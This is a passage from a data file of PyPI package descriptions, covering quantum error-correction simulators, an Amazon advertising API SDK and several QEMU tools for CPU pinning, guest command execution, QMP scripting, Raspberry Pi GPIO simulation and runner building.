\n0.03 3 0 567712 10000 0.01761456513161603 3 1.9e-2 0\n0.02 3 0 1255440 10000 0.007965334862677627 3 2.0e-2 0\n0.01 3 0 4705331 10000 0.002125248999485902 3 2.0e-2 0Change LogSeeCHANGELOG.mdContributionsYue Wu (yue.wu@yale.edu): implement 3D GUI. design and implement interactive tutorial. propose and implement na\u00efve decoder. implement MWPM decoder. Implement different variants of surface code and different decoders (see change log 2020.11.8 - 2022.3.20). The major developer and maintainer of this repository.Guojun Chen: collaborator of CPSC 559 course project: design GUI. design and implement machine learning based weight optimized MWPM decoder.Namitha Godawatte Liyanage: implement approximate MWPM decoder and FPGA related functionalities.Neil He: bind library to Python.AttributionWhen using QEC-Playground for research, please cite:TODO: arXiv link for related papers (probably the fusion blossom paper)"} +{"package": "qecsim", "pacakge-description": "qecsimis a Python 3 package for simulating quantum error correction using\nstabilizer codes.It provides access to all features via a command-line interface. It can also be\nused as a library via the fully-documented API. It includes many common codes,\nerror models and decoders, and can be extended with additional components.InstallationInstall and upgrade usingpip:$ pip install -U qecsimUsageCLI$ qecsim --version\nqecsim, version 1.0b9\n$ qecsim --help # console script\n...\n$ python -O -m qecsim --help # module script with Python options e.g. -O for optimize\n...API>>> import qecsim\n>>> qecsim.__version__\n'1.0b9'\n>>> from qecsim import app\n>>> help(app)\n...Extensionqecsim can be extended with additional codes, error models and decoders that\nintegrate into the command-line interface.\nSeehttps://github.com/qecsim/qecsimextfor a basic example.License / Citingqecsim is released under the BSD 3-Clause license. If you use qecsim in your\nresearch, please see theqecsim documentationfor citing details.LinksSource code:https://github.com/qecsim/qecsimDocumentation:https://qecsim.github.io/Issue tracker:https://github.com/qecsim/qecsim/issuesReleases:https://pypi.org/project/qecsim/Contact:qecsim@gmail.comCopyright 2016 - 2021, David K. Tuckett."} +{"package": "qecstruct", "pacakge-description": "No description available on PyPI."} +{"package": "qed", "pacakge-description": "No description available on PyPI."} +{"package": "qedit", "pacakge-description": "QEditA CLI for automatically editing videos using word detection.Recognizes words using the Vosken-us-smmodelIntelligently cuts out silence from the video"} +{"package": "qeds", "pacakge-description": "This package provides a simplified interface to datasets that we use\nfrequently.Loading dataTo see a list of available datasets runimportqedsqeds.data.available()To load one of the listed datasets rundf=qeds.data.load(\"dataset_name\")wheredataset_nameis replaced by one of the names returned byqeds.data.available().When you first load a dataset, qeds will fetch the data from\nsomewhere online. It will then save a local copy of the data to your\nhard drive. Subsequent requests to load a dataset (even in different\npython sessions) will first attempt to load the data from your hard\ndrive and only fetch from online if necessary.ConfigurationThe qeds library is configurable. 
Below is a listing of available\nconfiguration options.To see a list of valid configuration options runimportqedsqeds.data.config.describe_options()To set a configuration usevalourm.data.options[section.option] = value.For example, to set the configuration option for the BLS api_key I would\ncall:importqedsqeds.data.options[\"bls.api_key\"]=\"MY_API_KEY\"Developer docsContributing datasetsTo contribute a dataset you need to implement a function_retrieve_{name}inside the filedata/retrieve.py. This function\nis responsible for obtaining the data either \u201cby hand\u201d (data hard coded\ninto the function) or from online. The function must return a pandas\nDataFrame with the data."} +{"package": "qed-seal", "pacakge-description": "No description available on PyPI."} +{"package": "qedward", "pacakge-description": "Quantum EdwardInstallationYou can install Quantum Edward from the Python package managerpipusing:pip install qedward --userQuantum Edward at this point is just a small library of Python tools for\ndoing classical supervised learning on Quantum Neural Networks (QNNs).An analytical model of the QNN is entered as input into QEdward and the training\nis done on a classical computer, using training data already available (e.g.,\nMNIST), and using the famous BBVI (Black Box Variational Inference) method\ndescribed in Reference 1 below.The input analytical model of the QNN is given as a sequence of gate\noperations for a gate model quantum computer. The hidden variables are\nangles by which the qubits are rotated. The observed variables are the input\nand output of the quantum circuit. Since it is already expressed in the qc's\nnative language, once the QNN has been trained using QEdward, it can be\nrun immediately on a physical gate model qc such as the ones that IBM and\nGoogle have already built. By running the QNN on a qc and doing\nclassification with it, we can compare the performance in classification\ntasks of QNNs and classical artificial neural nets (ANNs).Other workers have proposed training a QNN on an actual physical qc. But\ncurrent qc's are still fairly quantum noisy. Training an analytical QNN on a\nclassical computer might yield better results than training it on a qc\nbecause in the first strategy, the qc's quantum noise does not degrade the\ntraining.The BBVI method is a mainstay of the \"Edward\" software library. Edward uses\nGoogle's TensorFlow lib to implement various inference methods (Monte Carlo\nand Variational ones) for Classical Bayesian Networks and for Hierarchical\nModels. H.M.s (pioneered by Andrew Gelman) are a subset of C.B. nets\n(pioneered by Judea Pearl). Edward is now officially a part of TensorFlow,\nand the original author of Edward, Dustin Tran, now works for Google. Before\nEdward came along, TensorFlow could only do networks with deterministic\nnodes. With the addition of Edward, TensorFlow now can do nets with both\ndeterministic and non-deterministic (probabilistic) nodes.This first baby-step lib does not do distributed computing. The hope is that\nit can be used as a kindergarten to learn about these techniques, and that\nthen the lessons learned can be used to write a library that does the same\nthing, classical supervised learning on QNNs, but in a distributed fashion\nusing Edward/TensorFlow on the cloud.The first version of Quantum Edward analyzes two QNN models called NbTrols\nand NoNbTrols. 
These two models were chosen because they are interesting to\nthe author, but the author attempted to make the library general enough so\nthat it can accommodate other akin models in the future. The allowable\nmodels are referred to as QNNs because they consist of 'layers',\nas do classical ANNs (Artificial Neural Nets). TensorFlow can analyze\nlayered models (e.g., ANN) or more general DAG (directed acyclic graph)\nmodels (e.g., Bayesian networks).This software is distributed under the MIT License.ReferencesR. Ranganath, S. Gerrish, D. M. Blei, \"Black Box Variational\nInference\",https://arxiv.org/abs/1401.0118https://en.wikipedia.org/wiki/Stochastic_approximationdiscusses Robbins-Monro conditionshttps://github.com/keyonvafa/logistic-reg-bbvi-blog/blob/master/log_reg_bbvi.pyhttp://edwardlib.org/https://discourse.edwardlib.org/"} +{"package": "qef", "pacakge-description": "qefquasielastic fittingFree software: MIT licenseDocumentation:https://qef.readthedocs.io.FeaturesTODOCreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.2.3 (2018-04-10)Include only qef directory in release0.2.2 (2018-04-10)Exclude tests directory from release0.2.1 (2018-04-10)Include subdirectories of qef in release0.2.0 (2018-04-09)Notebook for global fitting (PR #40)Load Mantid Nexus data (PR #38)Tabulated resolution model (PR #43)0.1.0 (2017-12-13)First release on PyPI."} +{"package": "qeGraphMaker", "pacakge-description": "No description available on PyPI."} +{"package": "qegueqrgobufqjke", "pacakge-description": "No description available on PyPI."} +{"package": "qeh", "pacakge-description": "Quantum Electrostatic Heterostructure ModelThe quantum electrostatic heterostructure (QEH) model is a\nfast and accurate model for simulating optical properties\nof stacks of 2D materials (heterostructures).Documentation:https://qeh.readthedocs.ioCode:https://gitlab.com/camd/qeh.git"} +{"package": "qeijo", "pacakge-description": "First of all,qeijois not an acronym. Okay, we have the Q and E for Quantum Espresso, for sure, but that's it.\nThe point was just to use a funny name for the package.qeijois an incorrect way - on purpose, of course - of spelling \"queijo\", which is simply the Portuguese word\nfor \"cheese\".This package contains a lightweight library that allows the user to launch electronic structure calculations with\nQuantum Espresso and then collect the results, all done in a Pythonic way. Just to be clear, I don't\nclaim that this package can compete in terms of features with much larger frameworks for atomistic\nsimulations, like ASE. All you can expect fromqeijois that it is light and easy to use.In version 0.1, there is only one module,pw, which must be used to build an input to the pw.x program,\nlaunch a total energy calculation and get from it important quantities, like the total energy of the\nsystem, the relaxed atomic coordinates, magnetization, etc. 
In future releases, I plan to add interfaces\nto other programs from the Quantum Espresso package, as well as work a bit more on user documentation.Basic Usage Example# Launching a calculation with pw.x of H2 molecule, reading the input from an existing input file\nfrom qeijo import pw\n\ncmd=\"mpirun -np 2 pw.x\"\nh2_calc=pw.calc()\nh2_calc.read_input(\"h2.inp\")\ninpstr=h2_calc.build_input()\nh2_out=h2_calc.run(command_line=cmd,input_string=inpstr,saveout=True,\n outfile=\"h2.out\",savecoords=True,coordfile=\"h2.xyz\")\n\n# Print the total energy in eV\nprint(\"Total energy: %f\" % h2_out.energy[-1])\n\n# Print the relaxed coordinates of the the two H atoms\nprint(\"H1: %f %f %f\" % (h2_out.x[0],h2_out.y[0],h2_out.z[0]))\nprint(\"H2: %f %f %f\" % (h2_out.x[1],h2_out.y[1],h2_out.z[1]))"} +{"package": "qempo-paapi5-python-sdk", "pacakge-description": "Product Advertising API 5.0 SDK for PythonThis repository contains the official Product Advertising API 5.0 Python SDK calledpaapi5-python-sdkthat allows you to access theProduct Advertising APIfrom your Python app.RequirementsPython 2.7 and 3.4+Installation & Usagepip installYou can directly install it from pip using:pipinstallpaapi5-python-sdkOr, you may also install directly from Githubpipinstallgit+https://github.com/amzn/paapi5-python-sdk.git(you may need to runpipwith root permission:sudo pip install git+https://github.com/amzn/paapi5-python-sdk.git)Then import the package:importpaapi5_python_sdkSetuptoolsInstall viaSetuptools.pythonsetup.pyinstall--user(orsudo python setup.py installto install the package for all users)Then import the package:importpaapi5_python_sdkGetting StartedPlease follow theinstallation procedureand then run the following:Simple example forSearchItemsto discover Amazon products with the keyword 'Harry Potter' in Books category:frompaapi5_python_sdk.api.default_apiimportDefaultApifrompaapi5_python_sdk.models.partner_typeimportPartnerTypefrompaapi5_python_sdk.restimportApiExceptionfrompaapi5_python_sdk.models.search_items_requestimportSearchItemsRequestfrompaapi5_python_sdk.models.search_items_resourceimportSearchItemsResourcedefsearch_items():\"\"\" Following are your credentials \"\"\"\"\"\" Please add your access key here \"\"\"access_key=\"\"\"\"\" Please add your secret key here \"\"\"secret_key=\"\"\"\"\" Please add your partner tag (store/tracking id) here \"\"\"partner_tag=\"\"\"\"\" PAAPI host and region to which you want to send request \"\"\"\"\"\" For more details refer: https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region\"\"\"host=\"webservices.amazon.com\"region=\"us-east-1\"\"\"\" API declaration \"\"\"default_api=DefaultApi(access_key=access_key,secret_key=secret_key,host=host,region=region)\"\"\" Request initialization\"\"\"\"\"\" Specify keywords \"\"\"keywords=\"Harry Potter\"\"\"\" Specify the category in which search request is to be made \"\"\"\"\"\" For more details, refer: https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html \"\"\"search_index=\"Books\"\"\"\" Specify item count to be returned in search result \"\"\"item_count=1\"\"\" Choose resources you want from SearchItemsResource enum \"\"\"\"\"\" For more details, refer: https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter \"\"\"search_items_resource=[SearchItemsResource.ITEMINFO_TITLE,SearchItemsResource.OFFERS_LISTINGS_PRICE,]\"\"\" Forming request 
\"\"\"try:search_items_request=SearchItemsRequest(partner_tag=partner_tag,partner_type=PartnerType.ASSOCIATES,keywords=keywords,search_index=search_index,item_count=item_count,resources=search_items_resource,)exceptValueErrorasexception:print(\"Error in forming SearchItemsRequest: \",exception)returntry:\"\"\" Sending request \"\"\"response=default_api.search_items(search_items_request)print(\"API called Successfully\")print(\"Complete Response:\",response)\"\"\" Parse response \"\"\"ifresponse.search_resultisnotNone:print(\"Printing first item information in SearchResult:\")item_0=response.search_result.items[0]ifitem_0isnotNone:ifitem_0.asinisnotNone:print(\"ASIN: \",item_0.asin)ifitem_0.detail_page_urlisnotNone:print(\"DetailPageURL: \",item_0.detail_page_url)if(item_0.item_infoisnotNoneanditem_0.item_info.titleisnotNoneanditem_0.item_info.title.display_valueisnotNone):print(\"Title: \",item_0.item_info.title.display_value)if(item_0.offersisnotNoneanditem_0.offers.listingsisnotNoneanditem_0.offers.listings[0].priceisnotNoneanditem_0.offers.listings[0].price.display_amountisnotNone):print(\"Buying Price: \",item_0.offers.listings[0].price.display_amount)ifresponse.errorsisnotNone:print(\"\\nPrinting Errors:\\nPrinting First Error Object from list of Errors\")print(\"Error code\",response.errors[0].code)print(\"Error message\",response.errors[0].message)exceptApiExceptionasexception:print(\"Error calling PA-API 5.0!\")print(\"Status code:\",exception.status)print(\"Errors :\",exception.body)print(\"Request ID:\",exception.headers[\"x-amzn-RequestId\"])exceptTypeErrorasexception:print(\"TypeError :\",exception)exceptValueErrorasexception:print(\"ValueError :\",exception)exceptExceptionasexception:print(\"Exception :\",exception)search_items()Complete documentation, installation instructions, and examples are availablehere.LicenseThis SDK is distributed under theApache License, Version 2.0, see LICENSE.txt and NOTICE.txt for more information."} +{"package": "qemu", "pacakge-description": "This is just a placeholder, registered in good faith on behalf of the\nQEMU project. 
I authorize any surrender of this account, package, or\nproject name to any Board Member representing QEMU to the Software\nFreedom Conservancy."} +{"package": "qemu-affinity", "pacakge-description": "qemu-affinityis a tool to easily pin certainQEMUthreads to select CPU cores.Getting StartedInstallingThis will install theqemu-affinitycommand to/usr/local/bin.Frompippip install qemu-affinityFrom sourceClone the repo and run:python setup.py installRequirementsqemu-affinityrequires Python 3.Noteqemu-systeminstances must be started with the-name,debug-threads=onargument forqemu-affinityto correctly identify and set the affinity of specificQEMUthreads.Usageqemu-affinity qemu-system-pid\n [-h] [--dry-run] [-v] [-p [AFFINITY]]\n [-q AFFINITY [AFFINITY ...]]\n [-k THREAD_AFFINITY [THREAD_AFFINITY ...]]\n [-i THREAD_AFFINITY [THREAD_AFFINITY ...]]\n [-w THREAD_AFFINITY [THREAD_AFFINITY ...]]\n [-t THREAD_AFFINITY [THREAD_AFFINITY ...]]Positional argumentsqemu-system-pidPID of the qemu-system processOptional arguments-h,--helpshow this help message and exit--dry-rundon\u2019t modify thread affinity values (useful with-v)-v,--verbosebe verbose-pAFFINITY,--process-affinityAFFINITYsetqemu-systemprocess affinity (and default for new threads)-qAFFINITY [AFFINITY...],--qemu-affinityAFFINITY [AFFINITY...]setqemu-systemthread affinity (partial name selectors not allowed)-kTHREAD_AFFINITY [THREAD_AFFINITY...],--kvm-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set KVM (CPU /KVM) thread affinity-iTHREAD_AFFINITY [THREAD_AFFINITY...],--io-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set IO object (IO ) thread affinity-wTHREAD_AFFINITY [THREAD_AFFINITY...],--worker-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set qemu worker (worker) thread affinity (partial name selectors not allowed, only positional)-tTHREAD_AFFINITY [THREAD_AFFINITY...],--thread-affinityTHREAD_AFFINITY [THREAD_AFFINITY...]set arbitary () thread affinityAFFINITYis anaffinity-specandTHREAD_AFFINITYcan be one of:affinity-specselector:affinity-specWhereaffinity-specis a CPU number, a range (inclusive) of CPU numbers separated by a\ndash (-), or a comma-delimited (,) list of CPU numbers or ranges.For example:0specifies CPU 00,1,2,3specifies CPU 0, 1, 2 and 30-3same as above0,2-4,6specifies CPU 0, 2, 3, 4 and 6and, whereselectoris one of:*, meaning all threadspartial-namefor-k(CPU /KVM) and-i(IO )namefor-tThe first variant,affinity-spec, selects threads based on argument position.e.g.,-k0,4 1,5 2,6 3,7pins the first KVM thread to CPUs 0 and 4, the second KVM thread to CPUs 1 and 5, and so on.The second variant,selector:affinity-spec, selects threads byselector, which is a partial name or wildcard.\nKVM threads have numeric names (0,1,2, etc.).\nIO threads have user-supplied names (-objectiothread,id=name).e.g.,-k2:2,6-imyiothread:7 *:0pins KVM thread2(akaCPU 2/KVM) to CPUs 2 and 6, IO threadmyiothread(akaIO myiothread) to CPU 7, and all remaining IO threads to\nCPU 0.The two variants can be combined.e.g.,-k0,4 *:2,6pins the first KVM thread to CPUs 0 and 4,and all remaining KVM threads to CPUs 2 and 6.Known Limitationsthe built-in help (qemu-affinity-h) lists theqemu-system-pidargument last in the list which may conflict with multi-argument parameters\nsuch as-q,-k,-i,-w, and-t.Either specifyqemu-system-pidat the beginning of the argument list or use--to separate the multi-argument parameters from the positional parameters.-t/--thread-affinityonly applies to the first of multiple threads that share an identical name (such as the 
QEMUworkerthreads).-tis unable to specify different affinities for threads with duplicate names, nor is it able to apply the same affinity value to multiple threads with the same name\n(*applies toallthreads, not just a sub-set).e.g.-tabc:1 abc:2results in an error, and there is no way to set all threads with the name \u201cabc\u201d to the same affinity value.Additionally, there is no way to select the nththread with the same name.e.g.-tabc:1will always select the 1stthread with the name \u201cabc\u201d.Sample UsageThe followingsystemd.service(5)startsQEMUas a daemon and then pins the 4 KVM threads (one for each emulated CPU core) to host CPUs 2, 3, 4 and 5. IO threads and other QEMU worker threads are pinned\nto host CPUs 0 and 1.In this example the host kernel has been configured to isolate cores 2, 3, 4 & 5 so they can be solely utilised byQEMU.[Unit]\nDescription=QEMU virtual machine\nAfter=network.target netctl@br0.service\n\n[Service]\nCPUSchedulingPolicy=rr\n\nType=forking\nPIDFile=/run/qemu_ex.pid\n\nEnvironment=QEMU_AUDIO_DRV=pa\n\nExecStart=/usr/bin/qemu-system-x86_64 -name example-qemu-machine,debug-threads=on -daemonize -pidfile /run/qemu_ex.pid -monitor unix:/tmp/qemu_ex.sock,server,nowait -smp cores=4,threads=1,sockets=1 ...\nExecStartPost=/bin/sh -c 'exec /usr/bin/qemu-affinity $MAINPID -p 0-1 -i *:0-1 -q 0-1 -w *:0-1 -k 2 3 4 5'\n\nExecStop=/bin/sh -c 'while test -d /proc/$MAINPID; do /usr/bin/echo system_powerdown | /usr/bin/socat - UNIX-CONNECT:/tmp/qemu_ex.sock; sleep 60; done'\nTimeoutStopSec=1m\n\n[Install]\nWantedBy=multi-user.target"} +{"package": "qemud", "pacakge-description": "UNKNOWN"} +{"package": "qemu-ga-exec", "pacakge-description": "Command executor for QEMU Windows guestsThis package providesqemu-ga-execscript to run a command inside a Windows\nguest using QEMU Guest Agent (GA). User must set up GA socket as described\ninQEMU wiki.usage: qemu-ga-exec [-h] --connect CONNECT [--verbose] [--env NAME=VALUE]\n [--path PATH] [--no-default-path] [--no-default-env]\n COMMAND [COMMAND ...]\n\nCommand executor for QEMU Windows guests.\n\npositional arguments:\n COMMAND guest command\n\noptional arguments:\n -h, --help show this help message and exit\n --connect CONNECT, -c CONNECT\n virtio-serial Unix socket path\n --verbose, -v increase output verbosity\n --env NAME=VALUE, -e NAME=VALUE\n guest environment variable\n --path PATH, -p PATH guest PATH component\n --no-default-path, -P\n do not prepend PATH with system folders\n --no-default-env, -E do not prepend environment with default valuesThe script requires Python 3 with standard library only, as it utilizesQEMU GA protocol.\nLicense is MIT."} +{"package": "qemu.qmp", "pacakge-description": "Welcome!qemu.qmpis aQEMU Monitor Protocol(\u201cQMP\u201d) library written in Python, usingasyncio. It is used to send\nQMP messages to runningQEMUemulators. It\nrequires Python 3.7+ and has no mandatory dependencies.This library can be used to communicate with QEMU emulators, theQEMU\nGuest Agent(QGA),\ntheQEMU Storage Daemon(QSD), or any other utility or application thatspeaks QMP.This library makes as few assumptions as possible about the actual\nversion or what type of endpoint it will be communicating with;\ni.e. this library does not contain command definitions and does not seek\nto be an SDK or a replacement for tools likelibvirtorvirsh. It is \u201csimply\u201d the protocol\n(QMP) and not the vocabulary (QAPI). It is up\nto the library user (you!) 
to know which commands and arguments you want\nto send.Who is this library for?It is firstly for developers of QEMU themselves; as the test\ninfrastructure of QEMU itself needs a convenient and scriptable\ninterface for testing QEMU. This library was split out of the QEMU\nsource tree in order to share a reference version of a QMP library that\nwas usable both within and outside of the QEMU source tree.Second, it\u2019s for those who are developingforQEMU by adding new\narchitectures, devices, or functionality; as well as targeting those who\nare developingwithQEMU, i.e. developers working on integrating QEMU\nfeatures into other projects such as libvirt, KubeVirt, Kata Containers,\netc. Occasionally, using existing virtual-machine (VM) management stacks\nthat integrate QEMU+KVM can make developing, testing, and debugging\nfeatures difficult. In these cases, having more \u2018raw\u2019 access to QEMU is\nbeneficial. This library is for you.Lastly, it\u2019s for power users who already use QEMU directly without the\naid of libvirt because they require the raw control and power this\naffords them.Who isn\u2019t this library for?It is not designed for anyone looking for a turn-key solution for VM\nmanagement. QEMU is a low-level component that resembles a particularly\nimpressive Swiss Army knife. This library does not manage that\ncomplexity and is largely \u201cVM-ignorant\u201d. It\u2019s not a replacement for\nprojects likelibvirt,virt-manager,GNOME Boxes, etc.InstallingThis package can be installed from PyPI with pip:> pip3 install qemu.qmpUsageLaunch QEMU with a monitor, e.g.:> qemu-system-x86_64 -qmp unix:qmp.sock,server=on,wait=offThen, at its simplest, script-style usage looks like this:import asyncio\nfrom qemu.qmp import QMPClient\n\nasync def main():\n qmp = QMPClient('my-vm-nickname')\n await qmp.connect('qmp.sock')\n\n res = await qmp.execute('query-status')\n print(f\"VM status: {res['status']}\")\n\n await qmp.disconnect()\n\nasyncio.run(main())The above script will connect to the UNIX socket located atqmp.sock, query the VM\u2019s runstate, then print it out\nto the terminal:> python3 example.py\nVM status: runningFor more complex usages, especially those that make full advantage of\nmonitoring asynchronous events, refer to theonline documentationor\ntypeimport qemu.qmp; help(qemu.qmp)in your Python terminal of\nchoice.ContributingContributions are quite welcome! Please file bugs using theGitLab\nissue tracker. This\nproject will accept GitLab merge requests, but due to the close\nassociation with the QEMU project, there are some additional guidelines:Please use the \u201cSigned-off-by\u201d tag in your commit messages. Seehttps://wiki.linuxfoundation.org/dcofor more information on this\nrequirement.This repository won\u2019t squash merge requests into a single commit on\npull; each commit should seek to be self-contained (within reason).Owing to the above, each commit sent as part of a merge request\nshould not introduce any temporary regressions, even if fixed later\nin the same merge request. This is done to preserve bisectability.Please associate every merge request with at least oneGitLab issue. This\nhelps with generating Changelog text and staying organized. 
Thank you\n\ud83d\ude47DevelopingOptional packages necessary for running code quality analysis for this\npackage can be installed with the optional dependency group \u201cdevel\u201d:pip install qemu.qmp[devel].make developcan be used to install this package in editable mode\n(to the current environment)andbring in testing dependencies in one\ncommand.make checkcan be used to run the available tests. Consultmake helpfor other targets and tests that make sense for different\noccasions.Before submitting a pull request, consider runningmakecheck-tox&& makecheck-minreqslocally to spot any issues that will\ncause the CI to fail. These checks use their ownvirtual environmentsand won\u2019t pollute your working\nspace.Stability and VersioningThis package uses a major.minor.microSemVer versioning, with the following additional semantics during\nthe alpha/beta period (Major version 0):This package treats 0.0.z versions as \u201calpha\u201d versions. Each micro\nversion update may change the API incompatibly. Early users are advised\nto pin against explicit versions, but check for updates often.A planned 0.1.z version will introduce the first \u201cbeta\u201d, whereafter each\nmicro update will be backwards compatible, but each minor update will\nnot be. The first beta version will be released after legacy.py is\nremoved, and the API is tentatively \u201cstable\u201d.Thereafter, normalSemVer/PEP440rules will apply; micro updates\nwill always be bugfixes, and minor updates will be reserved for\nbackwards compatible feature changes.Changelog0.0.3 (2023-07-10)This release addresses packaging issues associated with the forthcoming\nrelease of Python 3.12. This release adds Python 3.12 support, drops\nPython 3.6 support, and switches to PEP-517 native packaging.!25:\nDrop Python 3.6 support#30:\nThe read buffer limit has been increased from 256KiB to 10MiB for\nparity with libvirt\u2019s default and to accommodate real-world replies\nthat may exceed the current limit.#29:\nThe connect() call now accepts existing sockets as an \u2018address\u2019,\nallowing for easier use of socketpairs to create client/server pairs.\nThis functionality was revised in!22.!23:\nFix deadlock on disconnect under CPython 3.12.\nSee alsohttps://github.com/python/cpython/issues/104344.!24:\nSwitch to PEP517 native packaging to coincide with Python 3.12\ndropping distutils, setuptools from ensurepip, etc.0.0.2 (2022-08-26)This release primarily fixes development tooling, documentation, and\npackaging issues that have no impact on the library itself. A handful of\nsmall, runtime visible changes were added as polish.#28:\nAdded manual pages and web docs for qmp-shell[-wrap]#27:\nSupport building Sphinx docs from SDist files#26:\nAdd coverage.py support to GitLab merge requests#25:\nqmp-shell-wrap now exits gracefully when qemu-system not found.#24:\nMinor packaging fixes.#10:\nqmp-tui exits gracefully when [tui] extras are not installed.#09:\n__repr__ methods have been improved for all custom classes.#04:\nMutating QMPClient.name now also changes logging messages.0.0.1 (2022-07-20)Initial public release. 
(API is still subject to change!)"} +{"package": "qemu-rpi-gpio", "pacakge-description": "QEMU RPI GPIOSimulate GPIO in qemu-based Raspberry PiHow it worksThe script (qemu-rpi-gpio) present in this repository interacts with qemu\nusing the built-inqtestprotocol.Wrapping the protocol and interacting with the memory of the guest operating\nsystem, it can set or reset the various GPIOs.Note:Vanilla qemu (5.1.93) will not handle GPIO interrupts, therefore\nloading/sys/class/gpio/gpio$N/directionand waiting for an interrupt\nwill not do anything.To enable interrupt support you'll need to download and compilethis qemu fork.InstallationYou can install the script via pip withpip install qemu-rpi-gpioPrereqisitesYou needsocat,python3andpexpectlibrary to use this\nscript.These can be installed under ubuntu with:sudo apt install python3-pexpect socatTo download raspbian images you'll need 7zipsudo apt install p7zip-fullSetupDownload a raspbian image using./qemu-pi-setup/setup.shAfter this operation, execute the script to load the unix socket and make it\navailable to qemu./qemu-rpi-gpioYou will be prompted to an interactive shell, you can find the commands available\nin theInteracting with gpiossection.In another terminal execute the./qemu-pi-setup/run.shscript, this will execute a virtual\nraspberry pi and attach it to the gpio application.If you close the raspberry pi you can reload the socket using the commandreloadin the qemu-rpi-gpio prompt.Interacting with gpiosFirst of all, you need to export GPIOs in your guest Linux.\nIn a shell on your raspberry pi do:$ sudo su -\n# echo 4 >/sys/class/gpio/export\n# echo in >/sys/class/gpio/directionThe main commands in theqemu-rpi-gpioapplication are:commanddescriptionexampleget $Nget the value of GPIO $Nget 4set $N $Vset the value of GPIO $N to $V (1 or 0)set 4 1You can get the full list of commands usinghelpFor instance, let us set the value of the pre-exported gpio 4(gpio)> set 4 1Now you can read the value of your gpio# cat /sys/class/gpio/value\n1If we set it to zero, it will be immediately reflected in the guest system(gpio)> set 4 0# cat /sys/class/gpio/value\n0"} +{"package": "qemu-runner", "pacakge-description": "QEMU RunnerThis project allows creation of self-contained runner for QEMU with embedded command line arguments. Command line arguments are described in files calledlayers. They are simple INI files that can be combined together to express more complex command lines.>cat./arm_virt.ini[general]engine=qemu-system-arm[machine]@=virt\n\n>cat./ram_2G.ini[general]memory=2G\n\n>qemu_make_runner-l./arm_virt.ini./ram_2G.ini-o./my_runner.pyz\n>python./my_runner.pyz--dry-runkernel.elfarg1arg2# --dry-run to see effective command line instead of running QEMUqemu-system-arm-machinevirt-kernelkernel.elf-append'arg1 arg2'Resultingmy_runner.pyzfile is ZIP file withqemu_runnerpackage and layers. Runner has no extra dependencies, using only Python 3.8+ standard library. QEMU is found according to search precedence described below.Existing runner can be used as base for next runner.Derived runnerwill contain all layers from base runner along with additional layers specified when deriving. 
This features allows extending base runner with project specific settings without being aware of base settings.>cat./semihosting.ini[semihosting-config]enable=ontarget=native\n\n>python./my_runner.pyz--layers./semihosting.ini--derive./derived.pyz\n>python./derived.pyz--dry-runkernel.elfarg1arg2# --dry-run to see effective command line instead of running QEMUqemu-system-arm-machinevirt-semihosting-configenable=on,target=native-kernelkernel.elf-append'arg1 arg2'Runner provides following features, consult--helpoutput for details:GDB server settingsStart with CPU haltedInspect command lineQEMU search precedenceIf environment variableQEMU_DEVis set, it is used as path to QEMU executable.\nIf environment variableQEMU_DEVis not set but argument--qemuis specified it is used as path to QEMU executable.IfQEMU_DEVis not set, directories are searched for QEMU executable with name specified asenginein\ncombined layer:Directory specified byQEMU_DIRenvironment variableDirectory specified by--qemu-dirargumentEach ancestor directory containing runner, up to the root directory andqemusubdirectory at each level.\nIf runner's path isc:\\dir1\\dir2\\runner.pyz, then following directories are checked:c:\\dir1\\dir2c:\\dir1\\dir2\\qemuc:\\dir1\\c:\\dir1\\qemuc:\\c:\\qemuRepeat step 2 with path of base runner in case of derived runners with--tract-qemuoption.Repeat step 2 with path of passed as--qemu-dirwhen runner was derived.Directories inPATHenvironment variable.On Windows,PATHEXTvariable is used to determine executable extension.Environment variablesSeveral environment variables influences the way QEMU command line is constructed:QEMU_FLAGS- arguments to be added to the QEMU command line during executionQEMU_RUNNER_FLAGS- arguments will be interpreted exactly as if they were added to runner execution.Example:shell>QEMU_FLAGS='-d int'QEMU_RUNNER_FLAGS='--halted'./runner.pyz--dry-runkernel.elf\nqemu-system-arm-machinevirt-dint-S-kernelkernel.elfLayer search precedenceIf layer path is absolute and file is not found, search process fails immediately.If layer path is relative, following directories are searched:Current directoryPackages declaring entry pointqemu_runner_layer_packages(see below)Layer file formatLayersare plain INI files with sections describing QEMU command line. Layers can be combined together allowing user to build bigger command line from simpler building blocks.Values are interpreted as strings unless specified otherwise. When value is described as boolean, values1,yes,trueandonare interpreted as true, values0,no,falseandoffare interpreted as false. Other values are invalid.Section[general]Section[general]describes most common QEMU arguments.Available settings:engine- Name of QEMU executable (e.g.:qemu-system-arm,qemu-system-sparc)cpu- CPU to use in machine (-cpu option)memory- RAM memory size, supports suffixes likeM,G(e.g.20M,4G)gdb(boolean) - If true QEMU will be started with gdbserver enabled.gdb_dev- Use specified value as gdbserver listend address. If not used, default QEMU address will be used (tcp::1234at the time this document is written). Note that specifing onlygdb_devdoes not enable gdbserver.halted- Freeze QEMU CPU at startup.Section[name]Each section corresponds to single QEMU argument, e.g. section[machine]corresponds to-machineargument. Value specified as@key will be used as direct argument value (machine name, device type, etc). 
Remaining arguments will be added as key-value properties (note: foridproperty see next section).For example, layer:[machine]@=virtusb=ongic-version=2will be translated into-machine virt,usb=on,gic-version=2Section[name:id]As INI file syntax does not allow duplicated section names it is not possible to describe many QEMU arguments without additional syntax:-device,-netdev, etc. These arguments can be differentiated byidproperty which can be specified as section name in formatargument_name:id.For example, layer:[device:d1]@=type1arg1=10arg2=20[device:d2]@=type1arg1=10arg2=20[device:d3]@=type2arg3=10arg4=20translates into:-device type1,id=d1,arg1=10,arg2=20 -device type1,id=d2,arg1=10,arg2=20 -device type2,id=d3,arg3=10,arg4=20Variable resolutionIn sections[name]and[name:id]it is possible to use variables which will be resolved directly before building complete command lines. Variables are in form${VARIABLE_NAME}.Currently available variables:Variable nameValueKERNEL_DIRDirectory containing kernel executable (path is not normalized)How layers are combinedLayers can be combined by applying one layer on top of the another. Operation 'build layerLResultby applying layerLAddon top ofLBase' is defined as follows:[general](exceptcmdline) -LResultcontains all settings from layersLAddandLBase, values inLAddoverride values inLBase[general],cmdlinevalue -LResultcontainscmdlinefromLBasefollowed byLAdd(command line arguments are 